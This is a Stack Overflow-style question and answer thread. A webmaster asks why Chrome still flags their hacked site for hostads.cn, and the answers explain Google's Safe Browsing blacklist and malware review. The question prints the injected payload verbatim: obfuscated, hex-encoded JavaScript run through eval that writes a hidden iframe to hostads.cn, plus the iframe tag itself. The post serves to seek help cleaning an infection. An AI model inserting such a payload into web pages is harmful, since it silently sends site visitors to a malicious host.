# Malicious javascript injection (Hostads.cn)

Tags: javascript, html, malware

It seems that my website has been hacked, or an exploit was found or something so now everytime I load certain pages the following javascript and iframe get injected:

```
<script language="JavaScript" type="text/javascript">
B76197C940748B="pars";B76197C940748B+="eIn";B76197C940748B+="t";DCEC79103="St";DCEC79103+="ring.";DCEC79103+="fr";DCEC79103+="omC";DCEC79103+="harCo";DCEC79103+="de";function E0D7700E45C574E(A911795){var B3593798FBC66C=370;B3593798FBC66C=B3593798FBC66C-354;D086A805=eval(B76197C940748B+"(A911795,B3593798FBC66C)");return(D086A805);}function A41D3C153B9E8(E02A0){var D49C4143=940;D49C4143=D49C4143-938;var FB8E017784670AD="";for(E1709AB22C52CD=0;E1709AB22C52CD<E02A0.length;E1709AB22C52CD+=D49C4143){FB8E017784670AD+=( eval(DCEC79103+"(E0D7700E45C574E(E02A0.substr(E1709AB22C52CD,D49C4143)))"));}eval(FB8E017784670AD);}A41D3C153B9E8("69662028646F63756D656E742E636F6F6B69652E73656172636828227574626F3D382229203D3D202D3129207B0A7463707A3D646F63756D656E742E676574456C656D656E7442794964282771757A676327293B6966287463707A3D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D71757A6763207372633D687474703A2F2F686F73746164732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D20227574626F3D383B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");
</script>

<iframe id="quzgc" src="http://hostads.cn" style="display:none"></iframe>
```

I've updated all my passwords (of my control panel, database, ftp,... everything) and removed the malicious code on all of my pages, php files, javascript files etc... I also fixed the permissions of all my files and folders to 755. (The infected pages were set to 777).

The problem seems resolved in Internet Explorer, Firefox, Opera and Safari. Everything works fine there, and no malicious code is inserted anymore. However, when I surf to my website with Google Chrome, I get the famous "Warning: Malware detected" page telling me google has found content of "hostads.cn", a know malicious website. Then, when I look into the source code I can indeed see that certain piece of javascript and iframe in my code.

I tried debugging my website, going over the code step by step to check where or what might be injecting the code, but I really can't find anything. And all the other browsers don't seem to suffer from it either.

Another oddity: When I "let" my pages get infected: i.e: I ignore the warning from Chrome and continue to the webpage I can indeed see the malicious code in my source. But when I download that certain page with FTP, everything looks perfectly fine...

So why is this malicious code inserted in Google Chrome alone, but not in a persistent way? And more importantly: What can I do against it?

Thanks.

Comment: It's probably just a cache issue, try forcing a total refresh by using cntrl f5

Comment: you might want to read into this: http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633

Comment: It looks like you allready solved the problem but you are still on a blacklist. May be this tool can tell you exactly which blacklist you are on: http://www.google.com/safebrowsing/diagnostic?site=http://www.example.com

Comment: Tried a hard refresh and a cache clear, didn't work. @Andy

Answer (score 3, accepted):

Google works off a blacklist. You need to let Google know via Google Webmasters Tools that you have fixed it. I think you have removed the offending code from the site but you are still on the blacklist.

**Site Health**

https://support.google.com/webmasters/bin/answer.py?hl=en&answer=1624972

**Request a malware review**

https://support.google.com/webmasters/bin/answer.py?hl=en&answer=168328&ctx=cb&src=cb&cbid=15vfwobwt144o&cbrank=1

Comment: Thing is, the malware infection was not on a public section of the website, but on a password protected CMS section. Is Google able to "scan" that part too then?

Comment: Your browser dropped you in it ... when you accessed the site using Chrome it found the malware and told Google. See the Google Safe Browsing Features http://www.google.com/chrome/intl/en/privacy.html. Hopefully :( the "scan" will happen when you visit the site again.

Comment: Well, I added the site, and both the /CMS subfolder to my Google Webmaster account, checked for malware. Nothing found says Google, but I still get the warning message and see the malicious code appearing in my source. Perhaps it might take a few hours/days? I can use another browser in the meantime, but I'd like to see this resolved of course.

Comment: Ok, waiting for 10 minutes and then clearing the cache seemed to have done the trick. Thanks!